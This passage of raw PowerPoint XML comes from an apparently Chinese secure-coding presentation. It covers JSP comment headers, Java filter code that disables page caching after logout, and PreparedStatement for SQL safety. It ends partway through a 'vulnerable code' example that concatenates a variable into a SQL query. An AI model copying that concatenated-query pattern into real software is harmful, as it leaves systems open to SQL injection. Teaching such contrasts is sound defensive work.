            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-71091" y="73818"/>
            <a:ext cx="9043988" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>页面注释修改</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1071563" y="2786063"/>
          <a:ext cx="6096000" cy="1570037"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6096000"/>
              </a:tblGrid>
              <a:tr h="1570037">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="1">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>！</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>-- </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>功能描述：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>12580</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>商户联盟限时优惠</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>级页面改版</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>作者：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>XXX@c</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>-platform</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>时间：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2010</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>年</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>月</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>20</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>日</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>！</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45729" marB="45729">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="表格 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1071563" y="5072063"/>
          <a:ext cx="6096000" cy="1570037"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="6096000"/>
              </a:tblGrid>
              <a:tr h="1570037">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1"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&lt;%-- </a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Lucida Grande"/>
                        <a:ea typeface="方正中等线简体"/>
                        <a:cs typeface="方正中等线简体"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1"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	</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功能描述：</a:t>
                      </a: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12580</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商户联盟限时优惠</a:t>
                      </a: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3</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级页面改版</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1"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	</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作者：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Lucida Grande"/>
                          <a:ea typeface="方正中等线简体"/>
                          <a:cs typeface="方正中等线简体"/>
                        </a:rPr>
                        <a:t>XXX@c-platform</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Lucida Grande"/>
                        <a:ea typeface="方正中等线简体"/>
                        <a:cs typeface="方正中等线简体"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1"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	</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时间：</a:t>
                      </a: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2010</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年</a:t>
                      </a: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10</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月</a:t>
                      </a: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20</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Lucida Grande"/>
                          <a:ea typeface="方正中等线简体"/>
                          <a:cs typeface="方正中等线简体"/>
                        </a:rPr>
                        <a:t>日</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1"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Lucida Grande"/>
                          <a:ea typeface="方正中等线简体"/>
                          <a:cs typeface="方正中等线简体"/>
                        </a:rPr>
                        <a:t>--%&gt;</a:t>
                      </a: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700" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Lucida Grande"/>
                        <a:ea typeface="方正中等线简体"/>
                        <a:cs typeface="方正中等线简体"/>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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428625" y="1143000"/>
            <a:ext cx="8572500" cy="1938338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>为防止用户退出后，点击浏览器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>后退</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>按钮仍可以显示用户退出前访问的最后一个页面，需要强制所有页面不缓存。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>建议在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>管理后台程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的过滤器里增加如下代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50006" y="88900"/>
            <a:ext cx="9043988" cy="706438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>禁止页面缓存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="607218" y="3212976"/>
          <a:ext cx="8215313" cy="2286000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8215313"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>//</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>只是请求或响应消息不缓存</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>response.setHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>("Cache-Control", "no-cache"); </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>//</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>在请求消息中发送将使得请求和响应消息都不使用缓存</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>response.setHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>("Cache-Control", "no-store"); </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>//</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>缓存距离过期的时间为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>毫秒，即缓存立即过期</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>response.setDateHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>("Expires", 0); </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="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tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> //</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>页面不缓存</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>response.setHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>("</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pragma</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>", "no-cache");</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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357188" y="1071563"/>
            <a:ext cx="8786812" cy="2800350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="12700">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，通过预编译并存储在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PreparedStatement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>对象池中。下面实例代码是采用预编译语句的查询的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>实现，请参考：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>隐患代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>t_sys_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> where username=’”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
